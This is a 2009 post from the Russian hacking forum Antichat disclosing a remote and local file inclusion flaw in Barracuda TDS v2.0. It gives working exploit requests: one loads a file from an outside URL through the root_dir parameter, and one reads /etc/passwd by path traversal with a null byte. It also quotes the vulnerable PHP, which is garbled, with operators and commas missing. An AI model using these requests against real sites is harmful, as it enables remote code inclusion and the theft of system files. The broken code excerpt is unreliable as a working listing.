ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Barracuda TDS v2.0 RFI \ LFI
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Barracuda TDS v2.0 RFI \ LFI
  #1  
Старый 18.03.2009, 22:42
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию Barracuda TDS v2.0 RFI \ LFI
Barracuda TDS
Версия: 2.0
Скачать: http://skripters.com/engine/download.php?id=555
Зависимость: register_globals = on

RFI \ LFI (укомплектовано раскрытием путей))
Запрос:
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=http://google.com/?
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
PHP код:
$g_all_objects = array();
reset($g_all_objects);
foreach($g_allowed_array['components'] as $key)
{
    require_once($gParams['root_dir'].'components/'.$key.'.php');
    $key substr$key0strlen$key )-);
    $a 'g'.$key;
    $b 'c'.$key;
    $$a = new $b($gComponent);
    $g_all_objects[] = $a;

Еще присутствует мешок XSS'ок, только накой они нужны, если есть RFI?
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Mega File Hosting [ RFI/ LFI ] GarryCka Сценарии/CMF/СMS 17 18.03.2009 02:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ